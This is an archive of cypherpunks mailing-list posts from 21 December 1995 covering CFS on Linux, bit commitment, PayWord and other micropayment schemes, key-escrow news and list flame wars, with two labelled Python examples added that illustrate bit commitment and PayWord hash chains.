From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 21 Dec 95 10:08:05 PST
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512210440.XAA28196@crypto.com>
Message-ID: <9512211806.AA23346@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Matt Blaze writes:
> [...]
> I'm not sure exactly what problem you're having, but the most common
> CFS-Linux problem that people complain about has to do with the rpcgen
> output not being in the format expected by the rest of CFS.  There
> seem to be two things you can do about this:  get a version of rpcgen
> that generates the "standard" (original Sun) names for the functions it
> generates, or just grab the rpcgen output from the cfs-users mailing list
> archive ("echo help | mail cfs-users-request@research.att.com" for details).

You can get the original Sun ONC RPC 4.0 code, including rpcgen, from:

    ftp://bcm.tmc.edu/nfs/rpc_40.*

It also used to be at:

    ftp://wuarchive.wustl.edu/systems/sun/sun-exchange/rpc4.0

but this server is so busy that I can't verify this URL right now.

> NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
> I hereby admit that I'm a commie-fascist brainwashed sold out member of the
> military-industrial complex who has been programmed by his masters to
> infiltrate the cypherpunks in order to sap and impurify their precious
> bodily fluids.

You left out the part about helping to cover up the UFO abductions...

- --
Martin Janzen           janzen@idacom.hp.com
Pegasus Systems Group   c/o Hewlett-Packard, IDACOM Telecom Operation

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNmh+G3Fsi8cupgZAQFQ6AP/dHlQpig999yDQ8fY3yD3w9ZcKVTGCweU
M96oqf5aDltwRp9pMMRp5+5DsajRQoRdtMPhyDWMogkE7/zmMK8RGJlcJ0Z4j0Yi
3brRblzCwIjjSnwTrlPeoccmdrlLiUhisVn7iZknwGzJdmLFutR3TzW+ht08YKHq
6m9MBhQ8MTw=
=pYLf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 21 Dec 95 02:17:27 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512211018.KAA02190@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I was not interested in starting a flame but
I seem to have ignited one. I'm sorry about that.

Since almost nobody sees these people from big
corps as having a conflict of interest by being here
I am willing to drop the subject having raised
the point. It just seemed funny to me that
cypherPUNKS would be so happy to have these
fortune 500 types running the show. I guess
I see the point that these people have something
to contribute as long as they are honest about who
they are. I have to say it rubs me wrong though.

Like I said I've written a lot of code in my day
and many of you are probably running some of it
while you read this (enough said).

I just don't want to depend on att or
netscape to protect me. Even if they
do a good job the cost of using their
stuff is too high (for example the
fine print in that att product).

Let's write our own code and gpl it
so no one can take it away!

s/ Bill Gates





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 21 Dec 95 10:29:06 PST
To: cypherpunks@toad.com
Subject: Re: Bit Commitment Query
Message-ID: <199512211827.KAA16701@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


For Robbie Gates, I agree that the bit commitment he describes seems
more complicated than necessary.  The simpler one, where you just hash
(R,b), is the one I have seen used.  I suggest asking on sci.crypt.
Bruce Schneier and many other good cryptographers read that group.

For Futplex, the idea of using a block encryption algorithm in a 
similar way, encrypting (R,b) with a secret key K, and later revealing
K, is a little questionable because block encryption algorithms are not
designed to avoid collisions in the same way hashes are.  Futplex
suggests that it should be hard to find two keys K_1 and K_2 such that
E_K_1(R, b1) = E_K_2(R, b2) where b1<>b2.  But this is not necessarily
true.  A cryptosystem might have the property, say, that complementing
the key is equivalent to complementing bit 0 of the plaintext.  DES has
some simple complementation properties (although not this one).  Unless
you can show that a cipher with this property is inherently weak then
it is not a valid assumption that a cipher won't have this property.

There is some literature on creating hash functions out of block ciphers.
The two are really not interchangeable.

Hal
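
The two constructions discussed above, as an added example (not part of Hal's message or anyone's posted code). SHA-256 stands in for the unnamed hash, and toy_encrypt is a hypothetical cipher built here so that complementing the key equals complementing bit 0 of the plaintext, the property the message says cannot be ruled out.

```python
import hashlib
import hmac
import secrets

KEY_BITS = 128
KEY_MASK = (1 << KEY_BITS) - 1
HALF_BITS = 64
HALF_MASK = (1 << HALF_BITS) - 1


def hash_commit(r: bytes, b: int) -> bytes:
    """Commit to bit b by publishing H(R, b); R stays secret until opening."""
    return hashlib.sha256(r + bytes([b])).digest()


def hash_open(commitment: bytes, r: bytes, b: int) -> bool:
    """Receiver's check once the committer reveals (R, b)."""
    return hmac.compare_digest(commitment, hash_commit(r, b))


def _round(key: int, i: int, half: int) -> int:
    """Feistel round function: 64 bits of SHA-256(key, round, half)."""
    data = key.to_bytes(16, "big") + bytes([i]) + half.to_bytes(8, "big")
    return int.from_bytes(hashlib.sha256(data).digest()[:8], "big")


def _feistel(key: int, block: int) -> int:
    """Four-round Feistel permutation on a 128-bit block."""
    left, right = block >> HALF_BITS, block & HALF_MASK
    for i in range(4):
        left, right = right, left ^ _round(key, i, right)
    return (left << HALF_BITS) | right


def toy_encrypt(key: int, block: int) -> int:
    """Hypothetical cipher with E_{~K}(P) == E_K(P xor 1).

    K and ~K share one canonical key; the larger of the pair also flips
    bit 0 of the plaintext before the keyed permutation is applied.
    """
    canonical = min(key, key ^ KEY_MASK)
    flip = 1 if key != canonical else 0
    return _feistel(canonical, block ^ flip)


def cipher_commit(key: int, r: int, b: int) -> int:
    """Commit by encrypting (R, b) under secret K; b is bit 0 of the block.

    R is a 127-bit value that stays the same in both openings.
    """
    return toy_encrypt(key, (r << 1) | b)


def cipher_open(commitment: int, key: int, r: int, b: int) -> bool:
    """Receiver's check once the committer reveals K and claims bit b."""
    return toy_encrypt(key, (r << 1) | b) == commitment


def equivocate(key: int, b: int):
    """Second opening of the same ciphertext: complemented key, other bit."""
    return key ^ KEY_MASK, b ^ 1


if __name__ == "__main__":
    # Constructed sample values.
    r_bytes = secrets.token_bytes(16)
    c = hash_commit(r_bytes, 1)
    print("hash opens as 1:", hash_open(c, r_bytes, 1))
    print("hash opens as 0:", hash_open(c, r_bytes, 0))

    r, k = secrets.randbits(127), secrets.randbits(KEY_BITS)
    ct = cipher_commit(k, r, 1)
    k2, b2 = equivocate(k, 1)
    print("cipher opens as 1 under K :", cipher_open(ct, k, r, 1))
    print("cipher opens as 0 under ~K:", cipher_open(ct, k2, r, b2))
```

The keyed permutation itself is untouched by the trick, so the cipher can still be a sound cipher while the commitment built on it is not binding.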




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 21 Dec 95 10:52:58 PST
To: RobL <robl@on-ramp.ior.com>
Subject: Re: Microsoft Flame[tm] [NOISE]
Message-ID: <m0tSpkY-0008ynC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>Forget about the monopoly aspects for a second and look
>at MS as an American success story. It has all the classic elements: started
>small, with a crew of social misfits and eventually grew up.

>RobL
>------------------|-----------------------------------------------------------
>Rob Lowry         |                   
>PO Box 288        | 
>Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com


Well, I disagree.  Microsoft succeeded  primarily because it was "chosen" by
IBM in about 1981 or so, needing an OS for their PC.  MS didn't even write
it; Seattle Computer did, and that was a port of CP/M.  Not much creativity.
MSDOS revisions 1.0 and 1.1 were pure crap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: james@sparta.lcs.mit.edu (James W. O'Toole Jr.)
Date: Thu, 21 Dec 95 08:01:10 PST
To: dcsb@ai.mit.edu
Subject: brief review of MIT 12/15/95 "micro-commerce" talks
Message-ID: <9512211605.AA17350@sparta.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



This is a quick summary of the Friday 12/15/95 talks at MIT on
micro-commerce:

Millicent	--- Mark Manasse, Digital Equipment Corporation
	Brokers purchase "scrip" in large batches from vendors;
	users purchase scrip in small batches from brokers;
	users give small scrip to vendors in each purchase transaction.
	"Scrip" is vendor-specific and its validity can be efficiently
	verified using hashing.  No public-key crypto is required
	to carry out the protocols, because pairwise trust relationships
	between user and broker, and between broker and vendor, are
	established and these pairs share secrets.


PayWord		--- Ron Rivest, MIT
	Users are issued certificates by brokers, indicating that
	the broker will extend credit to the user.
	Users generate long hash-chains by repeatedly hashing a
	random seed value to obtain a hash-chain root.  Then the user
	promises to a specific vendor that he will pay one cent per
	element of that hash-chain.  This promise is made by the user
	signing (using PKC) the root of the hash chain.
	Each time the user wants to pay one cent to the vendor, she
	sends another element of the hash-chain, working backwards from
	the root, as in the S/Key system.  The vendor redeems the whole
	chain (or whatever portion the user has spent) by sending the
	user's signed promise and the last spent element of the chain
	to the broker.


MicroMint	--- Adi Shamir
	A scheme for issuing coins that is much more like traditional
	physical coin systems in that forgery and cheating are possible,
	but only practical on a large scale, and are detectable and can be
	combatted.  A "coin" in the MicroMint system is a set of 4 values
	that hash to the same value.  Producing such 4-way-colliding values
	is much less expensive in bulk than individually.  The mint produces
	coins in bulk and will redeem them into cash.  To combat active
	forgers, the mint can embed secrets in the coins and reveal the
	secrets	progressively so that vendors can detect forged coins
	cheaply.


Lightweight Signatures for Revocation	--- Silvio Micali, MIT
	A cost/performance analysis of the key revocation system for the
	U.S. Federal Government's Public Key Infrastructure.  Taking a
	MITRE-designed plan as a starting point, the communications costs
	are analyzed.  In the MITRE plan, the certification authorities issue
	revocation lists on a semi-weekly or daily basis, these lists being
	then stored in an untrusted and highly replicated database.  When
	a public key is being checked, the receiver queries the database
	to determine the status of the public-key.  In the talk, Silvio
	showed how lightweight signatures can be used to reduce the size
	(and therefore transmission cost) of the revocation lists.
	He also showed that transmission costs can be dramatically
	reduced by not sending large revocation lists in response to queries.
	Instead, the replicated database can store a timestamped
	key-status-report (signed by the certification authority) for
	every single key.  This key-status-report is much smaller than
	the full revocation list.

Overall, the PayWord scheme is probably the one to watch for actual use
on the Internet.  Millicent has an advantage of not using PKC, but
PayWord may be simpler to implement and is being discussed in the WWW
Consortium and the IETF as a possible draft standard.  It is also worth
noting that PayWord operates essentially by combining a
PKC-signature-based authentication (between user and broker) with a
One-Time-Password (OTP) authentication scheme (as in the S/Key system).
OTP has been getting standardized recently on the Internet and maybe
that will help too.
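
The PayWord hash-chain flow summarized above, as an added example (not code from the talk or from this message). SHA-256 is a stand-in hash, the names are hypothetical, and the user's PKC signature over the root is assumed to have been verified already; accepting a payword several steps ahead is a generalization beyond the one-cent-at-a-time description.

```python
import hashlib
import hmac
import secrets


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(n: int, seed: bytes = None) -> list:
    """Hash a random seed n times; return [w0, w1, ..., wn].

    w0 is the root the user signs; w_i is the i-th payword, with
    H(w_i) == w_(i-1), so paywords are spent working back toward the seed.
    """
    chain = [seed or secrets.token_bytes(32)]
    for _ in range(n):
        chain.append(H(chain[-1]))
    chain.reverse()
    return chain


class Vendor:
    """Vendor state: the last payword accepted and how many cents it covers."""

    def __init__(self, signed_root: bytes, max_len: int):
        # Assumption: the signature on signed_root was checked beforehand.
        self.last = signed_root
        self.spent = 0
        self.max_len = max_len

    def accept(self, index: int, payword: bytes) -> int:
        """Verify payword w_index; return the cents newly credited (0 if bad)."""
        steps = index - self.spent
        if steps < 1 or index > self.max_len:
            return 0  # replayed or out-of-range index
        x = payword
        for _ in range(steps):
            x = H(x)
        if not hmac.compare_digest(x, self.last):
            return 0  # does not hash back to the last accepted element
        self.last, self.spent = payword, index
        return steps


def broker_redeem(signed_root: bytes, last_payword: bytes,
                  count: int, max_len: int) -> int:
    """Broker's check at redemption: hashing the last spent element
    `count` times must reproduce the signed root. Returns cents owed."""
    if not 0 < count <= max_len:
        return 0
    x = last_payword
    for _ in range(count):
        x = H(x)
    return count if hmac.compare_digest(x, signed_root) else 0


if __name__ == "__main__":
    chain = make_chain(10)                      # constructed sample chain
    vendor = Vendor(chain[0], max_len=10)
    print("pay cent 1:", vendor.accept(1, chain[1]))
    print("pay cent 2:", vendor.accept(2, chain[2]))
    print("replay of cent 2:", vendor.accept(2, chain[2]))
    print("forged cent 3:", vendor.accept(3, secrets.token_bytes(32)))
    print("broker pays:", broker_redeem(chain[0], vendor.last, vendor.spent, 10))
    print("inflated claim pays:", broker_redeem(chain[0], vendor.last, 3, 10))
```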





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 08:05:48 PST
To: cypherpunks@toad.com
Subject: Encryption Rules Coming
Message-ID: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times, December 21, 1995, p. 4.


   Encryption rules to be prepared

   By Andrew Jack in Paris

   Representatives of international business and government
   yesterday agreed to draw up guidelines on encryption, a
   system which allows computer users to transmit information
   electronically with little risk that it can be intercepted
   and understood by unauthorised "hackers".

   The meeting, which was held at the International Chamber of
   Commerce in Paris, could lead to formal propositions
   prepared jointly by business and government organisations
   that could be ready by as soon as next summer.

   Yesterday's meeting did not have any formal legal
   authority, but was highly significant as the first forum
   where so many representatives of governments, businesses and
   computer experts met to discuss developments in encryption.

   Highly sophisticated encryption technology already exists
   in a number of countries including the US and Sweden. In
   the US, companies already have access to these programs. A
   growing number of businesses -- led by the banking sector
   -- are demanding access to these programs.

   However, many governments, including that of the US, have
   resisted permitting the technology to be exported because
   they fear it will fall into the hands of organised crime
   and terrorist organisations.

   They have demanded that they should be able to "hack" into
   computer transmissions for counter-intelligence and
   criminal investigation work, in the same way that they can
   conduct telephone-tapping exercises.

   An important conclusion of yesterday's Paris meeting was
   that business agreed in principle to allow such hacking to
   take place as long as sufficient safeguards were in place
   and "electronic search warrants" had been issued with
   proper judicial approval.

   A number of governments appear willing to permit relaxation
   of export controls on sophisticated encryption devices as
   long as these safeguards are in place.

   Among the issues that experts on both sides need to resolve
   are the ways in which "keys" allowing computer
   transmissions to be decoded would be handled.

   A number of business organisations have discussed the use
   of third-party organisations, which would be independent of
   government, would have the keys and would hand them over to
   government investigators when demands were justified.

   However, the organisations still have to resolve a number
   of issues, including how these custodians could be made
   legally liable for any unauthorised access to this
   information and for the costs of its misuse.

   [End]

----------

   Does anyone have press reports or more information on this 
   meeting? Any connection to the recently signed Transatlantic
   Agenda?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "neB .veR" <samman-ben@CS.YALE.EDU>
Date: Thu, 21 Dec 95 08:07:30 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951221093459.4338t-100000@goya>
Message-ID: <Pine.A32.3.91.951221110522.2762A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, David Mandl wrote:

> > Best not to cypherdunk the already nym-shot victims. Privacy is 
> > paramount, bellows this list, no?
> 
> Um, sure, John.
> 
> Cypherpunk relevance: There's apparently an encrypted message in
> John's last paragraph above.  A free T-shirt to the first person to
> find it.

Um....I think that's just his writing style.


Ben.

PS: I've just finished the first copy of a zero-knowledge client/server 
application.  It's really basic--I'll be adding BBS to it RSN.  If you 
want it, mail me.

PPS: There's no crypto--just Fiat-Feige-Shamir ZKIPofI.  Can I export this?

____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 21 Dec 95 09:15:04 PST
To: cypherpunks@toad.com
Subject: Encryption Rules Coming
In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com>
Message-ID: <9512211714.AA08868@alpha>
MIME-Version: 1.0
Content-Type: text/plain



 >    Financial Times, December 21, 1995, p. 4.
 > 
 >    However, many governments, including that of the US, have
 >    resisted permitting the technology to be exported because
 >    they fear it will fall into the hands of organised crime
 >    and terrorist organisations.

I am forced to wonder whether the people who type in stories like this
are conscious while they do so.  Replace "the technology" with
"pistols" in the above paragraph; it doesn't make any sense unless you
assume there are no organized crime or terrorist organizations in the
US, or that such organizations can only acquire things that pass
through national borders.  Are news editors so technophobic that they
assume there must be something they just "don't get"?


On a vaguely related note, I saw a quick preview for an episode of
"The Client".  The episode was supposed to be about Internet child
molesters (who I suppose are the ones that know the secret
"meta-alt-ctrl" sequence that causes the innocent victims on the other
end of the wire to be abused via modem).  Anybody see it?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 21 Dec 95 11:25:50 PST
To: cypherpunks@toad.com
Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512211924.LAA21493@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of others' efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth.

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company whose Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned sight better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Dec 95 10:17:55 PST
To: cypherpunks@toad.com
Subject: Re: The War on Some Money [long]
Message-ID: <acfee17a030210040934@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Amidst all the flames about impure Cypherpunks on the list, about evil
capitalist corporations, about conspiracies involving the underground Grey
Alien bases in Nevada, and amidst the flames about posts not dealing solely
with number theory or ciphers, it's nice to read a post like this one from
David Murray.

The tension between "private transactions" and "traceable transactions" is
indeed at the core of the debate.

Kudos to David on this. I just want to end on a positive note before
leaving for the holidays (the birthday of my savior, F. Hayek, of course).

--Tim May




Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 21 Dec 95 11:36:41 PST
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <2.2b7.32.19951221193732.008cb5b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 12/20/95 -0500, Matt Blaze wrote:

>I'm told that all versions of CFS since 1.0.4 (the latest is 1.3.1)
>do work out-of-the-box under *some* releases of Linux and with some
>coaxing on the others.

I am wondering if he is compiling for ELF.  That seems to throw a good size
monkey wrench into just about every piece of software out there.  (At least
the ones that have not been written to take the ELF peculiarities into account.)

>I'm not sure exactly what problem you're having, but the most common
>CFS-Linux problem that people complain about has to do with the rpcgen
>output not being in the format expected by the rest of CFS.  There
>seem to be two things you can do about this:  get a version of rpcgen
>that generates the "standard" (original Sun) names for the functions it
>generates, or just grab the rpcgen output from the cfs-users mailing list
>archive ("echo help | mail cfs-users-request@research att.com" for details).

I think you may be right on this one.  I have heard of a few other things
having problems with Linux's version of rpcgen.  (The names of which are not
coming to mind...  Need more coffee.)

[rest of reply deleted because I had nothing to say about it]

ObNoise:
>NB to "Bill Gates" and friends:  To save you the trouble of pointing it out,
>I hereby admit that I'm a commie-fascist brainwashed sold out member of the
>military-industrial complex who has been programmed by his masters to
>infiltrate the cypherpunks in order to sap and impurify their precious
>bodily fluids.

I think that the mention of Mr. Bill as a "good guy" is the most effective
use of agent provocateur-type behaviour I have seen on this list yet.

We know who Matt and Jeff work for.  Who do the anon-flamers work for?

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Dec 95 08:39:40 PST
To: cypherpunks@toad.com
Subject: KGB_cia
Message-ID: <199512211639.LAA04102@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-21-95. WPutz:

   "In an unusual interview Yevgeny Primakov, head of the
   Russian Foreign Intelligence Service, discussed problems
   and challenges facing his intelligence agency in terms that
   often sounded like testimony that CIA Director John M.
   Deutch gave the House intelligence committee Tuesday.

   In comments that echoed those of his U.S. counterparts,
   Primakov charged that some post-Cold War budget cuts in his
   agency developed 'because the [Russian] press ganged up on
   us [and] many newspapers wrote absurd things about us,
   including statements that foreign intelligence was no
   longer necessary at all.' His remarks about media coverage
   were similar to recent statements by Deutch and his
   predecessors, R. James Woolsey and Robert M. Gates."


   KGB_cia  (5 cia)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 21 Dec 95 08:54:31 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <Pine.BSD.3.91.951221115215.9337B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 12 17 95 jimbell@pacifier.com proposed 
 
    ...a system...that would "blind" campaign donations as to 
    their source:  The donor could be satisfied that his dona- 
    tion gets to the candidate or cause, but the candidate could- 
    n't know  who actually paid the money (and the donor would 
    be unable to prove that he made a donation...). 
 
 
Let's analyse: 
 
A gives B what B wants (money) so that B will give A what A 
  wants (whatever). 
A knows B got the money. 
A can't prove he gave the money to B. 
 
B knows he got the money. 
B can't be sure that A gave the money. 
 
So, depending on time, place, and circumstance; and assum- 
ing B's elected: 
 
     B will not give A what A wants
 
                 OR 
 
     B will give A what A wants 
 
 
For instance, if... 
 
 
  A gives the money but dies before B gets elected. 
 
  A gives the money but gets sent to the Balkans. 
 
  A is a nobody. 
 
 
...B will not give A what A wants. 
 
 
For instance, if... 
 
 
  A gives the money but B's already in debt to him, and the 
    balloon payment's due. 
 
  A gives the money and A's appointed head of an office where 
    B's relatives "work." 
 
  A is the main man in town. 
 
 
...B will give A what A wants. 
 
 
Some things are known by some people whether they're entered 
on the books or not. 
 
I agree with the proposer that his system 
 
    ...would change politics as we know it.
 
 
Flexible corruption is best. 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 21 Dec 95 12:01:29 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512211958.LAA27482@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Plotnikoff, in his regular (WWW oriented) column in the San Jose
Mercury News, writes:

DOES YOUR BOSS KNOW WHERE YOU'RE SURFING?

The SIMBA Media daily reported recently that a Maryland-based software
publisher called Charles River Media has introduced a $30 electronic fink
program called "Internet Watchdog" that keeps an eye on where you've been
hanging out on the Net.  The program doesn't block or censor sites, but it
does maintain a handy record of cyber-footprints that the parent, teacher
or employer who controls your Net access can peruse.

----[end]----

Anyone know more about this program?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Dec 95 09:05:23 PST
To: cypherpunks@toad.com
Subject: just a reminder...
Message-ID: <199512211705.MAA01270@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't anti-trust punks...

...or microsoft punks...

...it's cypherpunks...

...Just a reminder.

.pm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Dec 95 11:26:44 PST
To: cypherpunks@toad.com
Subject: Re: Cypherpunks resumes?
Message-ID: <acfef043040210048277@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:55 AM 12/21/95, Anonymous wrote:
>Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts
>in the archives anytime soon?  It would be nice to see a face connected
>to the postings here.  Some of us don't get the chance of getting out
>west for the parties, The only other thing I know about Tim May besides
>being one of the Fathers of the Cypherpunks is that he was a naked hippie
>in a hot tub at some party that Robert Hettinga was at some weeks ago,
>
>That doesn't paint a good picture for me.
-


But, "Anonymous," we don't even know which of the many "Anonymous" ones you
are, so why should we go out of our way to provide images, resumes,
dossiers, etc., to you?

In any case, many of the folks on this list have elected to have Web pages,
often with images of themselves, their SOs, their pets, their computers,
and so on. Perhaps their images will paint a better picture for you. (I
note that the last "Anonymous" person concerned with getting the "real"
pictures of people was S. Boxx, or maybe Pablo Escobar, I forget.)

(I have not spent time generating a "home page." I see the burgeoning
shelves of "HTML Bible" self-help books and see more and more people
spending time gussying-up their home pages. People are even putting their
personal diaries on the Web, plus all sorts of personal stuff that is
finding its way into compiled dossiers. Not for me. I prefer my essays to
be what goes into my dossiers.)

Or, as our esteemed Gothamite might reJoyce:

Erudite, profligate, disputacious -- indistinguishable from many other
